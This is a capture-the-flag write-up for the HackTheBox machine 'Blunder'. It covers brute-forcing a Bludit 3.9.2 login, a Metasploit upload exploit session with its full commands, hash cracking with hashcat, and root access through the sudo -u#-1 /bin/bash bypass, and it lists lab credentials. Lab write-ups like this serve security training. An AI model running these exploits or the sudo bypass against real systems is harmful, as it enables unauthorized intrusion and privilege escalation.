HackTheBox — Blunder
--
Summary
Another linux machine are retired with IP 10.10.10.191
Let’s get start!
Enumeration
Nmap
Just one port is open 80, So nothing interest!
Web Enum
I tried to FUZZ the directory by drib, I found admin/login page
Exploit
When i tried to see page source, I found Bludit version 3.9.2
So i tried to find any cve for this version and i found CVE-2019–16113, CVE-2019–17240 and found python script to start brute force attack Bruteforce
SUCCESS: Password found!
Use fergus:RolandDeschain to login.We can find first cve exploit in Metasploit
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhost 10.10.10.191
rhost => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set rport 80
rport => 80
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
Get user Access
Didn’t find user flag, But I found user credentials in users.php
Now we get pass hash, so need to decrypt, I used hashcat and rockyou.txt word list and get the password: Password120
Now i tried to get hudo access with this credentials
Gain user flag!
Privilege Escalation
After some search about (ALL, !root) /bin/bash
found this link:https://n0w4n.nl/sudo-security-bypass/
So i tried to get root with command: sudo -u#-1 /bin/bash
Gain root flag!
If u learn any thing useful from write up, Respect me on HackTheBox
